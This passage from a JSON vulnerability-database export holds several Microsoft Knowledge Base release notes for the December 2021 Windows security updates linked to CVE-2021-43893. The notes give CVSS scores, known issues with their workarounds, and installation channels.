5008218](<https://download.microsoft.com/download/3/b/b/3bbc36f1-c047-464c-a48a-6dd128552e3a/5008218.csv>).For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 17763.2350.](<https://download.microsoft.com/download/f/d/e/fde3138d-3ad1-4278-8295-a6ed8b4887ec/SSU_version_17763_2350.csv>)\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008218 (OS Build 17763.2366)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008218", "href": "https://support.microsoft.com/en-us/help/5008218", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:43", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**IMPORTANT **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Update to support the cancellation of daylight savings time (DST) for 2021 for the Republic of Fiji.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5006671](<https://support.microsoft.com/help/5006671>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008255>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5008255](<https://download.microsoft.com/download/e/b/9/eb9e51f0-8b62-431f-add6-964646eaa476/5008255.csv>).\n\n## **References**\n\n### \n\n__\n\nThird-party information disclaimer\n\nThe third-party products that this article discusses are manufactured by companies that are independent of Microsoft. We make no warranty, implied or otherwise, about the performance or reliability of these products.We provide third-party contact information to help you find technical support. This contact information may change without notice. We do not guarantee the accuracy of this third-party contact information.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008255 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008255", "href": "https://support.microsoft.com/en-us/help/5008255", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:44", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**IMPORTANT** Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5007260](<https://support.microsoft.com/help/5007260>) (released previous November 9, 2021) and addresses the following issue:\n\n * Update to support the cancellation of daylight savings time (DST) for 2021 for the Republic of Fiji.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008277>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5008277](<https://download.microsoft.com/download/a/1/d/a1d7ece3-40a3-4d0f-8586-7a7acebc30d2/5008277.csv>). \n\n## **References**\n\n### \n\n__\n\nThird-party information disclaimer\n\nThe third-party products that this article discusses are manufactured by companies that are independent of Microsoft. We make no warranty, implied or otherwise, about the performance or reliability of these products.We provide third-party contact information to help you find technical support. This contact information may change without notice. We do not guarantee the accuracy of this third-party contact information.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008277 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008277", "href": "https://support.microsoft.com/en-us/help/5008277", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:39", "description": "None\n**11/9/21 \nIMPORTANT** Because of minimal operations during the holidays and the upcoming Western new year, there won\u2019t be a preview release (known as a \u201cC\u201d release) for the month of December 2021. There will be a monthly security release (known as a \u201cB\u201d release) for December 2021. Normal monthly servicing for both B and C releases will resume in January 2022. \n\n**UPDATED 12/14/21** \n**REMINDER **Windows 10, version 2004 has reached end of servicing as of this release on December 14, 2021. To continue receiving security and quality updates, Microsoft recommends that you update to the latest version of Windows 10.To update to one of the newer versions of Windows 10, we recommend that you use the appropriate Enablement Package KB (EKB). Using the EKB makes updating faster and easier and requires a single restart. To find the EKB for a specific OS, go to the **Improvements and fixes** section and click or tap the OS name to expand the collapsible section.\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 2004, see its [update history page](<https://support.microsoft.com/en-us/help/4555932>). **Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the Windows release health dashboard.\n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10, version 21H2\n\n**Important: **Use EKB KB5003791 to update to Windows 10, version 21H2.\n\nThis security update includes quality improvements. Key changes include: \n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release. \n\n### \n\n__\n\nWindows 10, version 21H1\n\n**Important: **Use EKB KB5000736 to update to Windows 10, version 21H1.\n\nThis security update includes quality improvements. Key changes include: \n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\n**Important: **Use EKB KB4562830 to update to Windows 10, version 20H2.\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1173) released December 14, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n### Windows 10 servicing stack update - 19041.1371, 19042.1371, 19043.1371, and 19044.1371\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing the June 21, 2021 (KB5003690) update, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \n| \nAfter installing this update, text input using a Japanese IME might be entered out of order or the text cursor might move unexpectedly in apps that use the [multibyte character set (MBCS)](<https://docs.microsoft.com/cpp/text/support-for-multibyte-character-sets-mbcss>). This issue affects both the Microsoft Japanese IME and third-party Japanese IMEs.| This issue is resolved in KB5009543. \nAfter installing the November 22, 2021 or later updates, recent emails might not appear in search results in the Microsoft Outlook desktop app. This issue is related to emails that have been stored locally in a PST or OST files. It might affect POP and IMAP accounts, as well as accounts hosted on Microsoft Exchange and Microsoft 365. If the default search in the Microsoft Outlook app is set to server search, the issue will only affect the advanced search.| This issue is resolved in KB5010342.**Alternate resolution if you have not installed updates dated February 8, 2022 or later** This issue is resolved using [Known Issue Rollback (KIR)](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/known-issue-rollback-helping-you-keep-windows-devices-protected/ba-p/2176831>). Please note that it might take up to 24 hours for the resolution to propagate automatically to consumer devices and non-managed business devices. Restarting your Windows device might help the resolution apply to your device faster. For enterprise-managed devices that have installed an affected update and encountered this issue, you can resolve this by installing and configuring a special Group Policy (preferred).**Important **Verify that you are using the correct Group Policy for your version of Windows.Group Policy: [Windows 10, version 20H2, Windows 10, version 21H1 and Windows 10, version 21H2](<https://download.microsoft.com/download/4/a/d/4adcd2e9-413d-4d49-9f0e-c69629dfd292/Windows%2010%20%282004%2c%2020H2%20&%2021H1%29%20Known%20Issue%20Rollback%20011422%2001.msi>) \nWhen attempting to reset a Windows device with apps that have folders with [reparse data](<https://docs.microsoft.com/windows/win32/fileio/reparse-points>), such as OneDrive or OneDrive for Business, files which have been downloaded or synced locally from OneDrive might not be deleted when selecting the \u201cRemove everything\u201d option. This issue might be encountered when attempting a [manual reset initiated within Windows](<https://support.microsoft.com/windows/recovery-options-in-windows-31ce2444-7de3-818c-d626-e3b5a3024da5#bkmk_win11_reset_pc>) or a remote reset. Remote resets might be initiated from Mobile Device Management (MDM) or other management applications, such as [Microsoft Intune](<https://docs.microsoft.com/mem/intune/remote-actions/device-fresh-start>) or third-party tools. OneDrive files that are \u201ccloud only\u201d or have not been downloaded or opened on the device are not affected and will not persist, as the files are not downloaded or synced locally.**Note** Some device manufacturers and some documentation might call the feature to reset your device, \"Push Button Reset\", \"PBR\", \"Reset This PC\", \"Reset PC\", or \"Fresh Start\".| This issue was addressed in KB5011487. Some devices might take up to seven (7) days after the installation of KB5011487 to fully address the issue and prevent files from persisting after a reset. For immediate effect, you can manually trigger Windows Update Troubleshooter using the instructions in [Windows Update Troubleshooter](<https://support.microsoft.com/windows/windows-update-troubleshooter-19bc41ca-ad72-ae67-af3c-89ce169755dd>). If you are part of an organization that manages devices or prepared OS images for deployment, you can also address this issue by applying a compatibility update for installing and recovering Windows. Doing that makes improvements to the \"safe operating system\" (SafeOS) that is used to update the Windows recovery environment (WinRE). You can deploy these updates using the instructions in [Add an update package to Windows RE](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/add-update-to-winre?view=windows-10>) using [KB5012419](<https://support.microsoft.com/help/5012419>) for Windows 10, version 21H2, Windows 10, version 21H1, and Windows 10, version 20H2.**Important **If devices have already been reset and OneDrive files have persisted, you must use a workaround above or perform another reset after applying one of the workarounds above. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>).Prerequisite:For Windows Server Update Services (WSUS) deployment or when installing the standalone package from Microsoft Update Catalog:If your devices do not have the May 11, 2021 update (KB5003173) or later LCU, you **must **install the special standalone August 10, 2021 SSU (KB5005260).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog ](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008212>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5008212](<https://download.microsoft.com/download/b/9/8/b980d4e3-fff0-47e1-9a52-1978344b7699/5008212.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1371, 19042.1371, 19043.1371, and 19044.1371](<https://download.microsoft.com/download/f/b/e/fbec8f36-7d5a-4ef5-bce5-fb08faca328e/SSU_version_19041_1371.csv>). \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008212 (OS Builds 19041.1415, 19042.1415, 19043.1415, and 19044.1415)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008212", "href": "https://support.microsoft.com/en-us/help/5008212", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:44", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**IMPORTANT** Windows 7, Windows Server 2008 R2, Windows Embedded Standard 7, and Windows Embedded POS Ready 7 have reached the end of mainstream support and are now in extended security update (ESU) support. Windows Thin PC has reached the end of mainstream support; however, ESU support is not available. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Update to support the cancellation of daylight savings time (DST) for 2021 for the Republic of Fiji.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed **in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\n * If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates. Extended support ended as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ended on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ended on October 13, 2020.\n * For Windows Embedded POS Ready 7, extended support ended on October 12, 2021.\n * For Windows Thin PC, extended support ended on October 12, 2021. Note that ESU support is not available for Windows Thin PC.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB5006749](<https://support.microsoft.com/help/5006749>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5006671](<https://support.microsoft.com/help/5006671>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008282>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5008282](<https://download.microsoft.com/download/6/9/3/69384bb2-5602-4ea1-a659-4d324b8cf9eb/5008282.csv>).\n\n## **References**\n\n### \n\n__\n\nThird-party information disclaimer\n\nThe third-party products that this article discusses are manufactured by companies that are independent of Microsoft. We make no warranty, implied or otherwise, about the performance or reliability of these products.We provide third-party contact information to help you find technical support. This contact information may change without notice. We do not guarantee the accuracy of this third-party contact information.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", 